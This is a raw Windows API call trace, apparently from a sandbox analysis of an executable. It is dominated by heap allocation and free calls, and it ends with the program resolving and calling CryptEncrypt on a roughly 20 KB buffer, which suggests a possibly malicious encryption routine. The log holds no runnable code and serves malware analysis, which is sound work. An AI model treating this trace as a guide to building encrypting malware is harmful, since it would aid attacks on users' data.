(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0226.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0226.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0226.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0226.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0226.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0226.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0226.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0226.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0226.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0226.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0226.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0226.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0226.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0226.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0226.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0226.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0226.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0226.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0226.752] CharLowerBuffW (in: lpsz="byte[20376]", cchLength=0xb | out: lpsz="byte[20376]") returned 0xb [0226.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0226.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0226.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0226.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0226.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0226.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0226.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0226.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0226.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0226.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0226.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0226.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0226.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0226.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0226.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0226.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0226.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4f98) returned 0x2f1e758 [0226.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0226.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0226.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0226.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0226.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0226.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0226.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0226.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0226.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0226.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0226.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0226.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0226.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0226.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0226.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0226.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0226.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0226.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0226.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0226.754] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0226.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0226.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0226.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0226.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0226.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0226.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0226.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0226.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0226.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0226.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0226.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0226.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0226.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0226.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4f91) returned 0x2f236f8 [0226.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0226.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0226.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4f91) returned 0x2f28698 [0226.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0226.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0226.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0226.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0226.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0226.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0226.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f236f8 | out: hHeap=0x970000) returned 1 [0226.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0226.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0226.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0226.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f28698 | out: hHeap=0x970000) returned 1 [0226.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0226.756] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0226.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0226.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0226.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0226.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0226.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0226.756] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0226.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0226.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0226.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51010 [0226.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0226.757] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0226.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0226.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0226.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0226.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0226.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0226.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0226.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0226.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0226.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0226.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0226.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0226.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0226.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0226.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0226.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0226.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0226.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0226.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0226.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0226.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0226.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0226.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0226.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0226.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0226.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0226.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0226.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0226.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0226.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0226.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0226.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0226.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0226.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0226.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0226.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0226.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0226.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0226.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0226.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0226.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0226.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0226.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0226.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0226.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0226.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0226.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0226.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0226.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0226.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0226.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0226.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0226.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0226.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0226.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0226.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0226.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0226.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0226.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0226.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0226.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0226.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0226.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0226.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0226.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0226.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0226.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0226.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0226.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0226.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4f91) returned 0x2f236f8 [0226.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0226.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f236f8 | out: hHeap=0x970000) returned 1 [0226.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0226.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0226.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0226.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0226.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0226.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0226.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0226.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0226.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x978490 [0226.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0226.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0226.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0226.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0226.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0226.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0226.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0226.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0226.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0226.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0226.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0226.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0226.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0226.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0226.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0226.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0226.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0226.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0226.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0226.761] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0226.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0226.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0226.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0226.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0226.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0226.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0226.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0226.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0226.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0226.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0226.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0226.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0226.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0226.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0226.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0226.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0226.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0226.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0226.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0226.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0226.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0226.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0226.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0226.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0226.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0226.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0226.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0226.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0226.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0226.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0226.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0226.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0226.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0226.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0226.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0226.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0226.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0226.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0226.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0226.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0226.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0226.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e514c0 [0226.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e514c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0226.764] CryptEncrypt (in: hKey=0xa87650, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f1e758*, pdwDataLen=0x8cef60*=0x4f91, dwBufLen=0x4f98 | out: pbData=0x2f1e758*, pdwDataLen=0x8cef60*=0x4f98) returned 1 [0226.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978518 [0226.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0226.818] 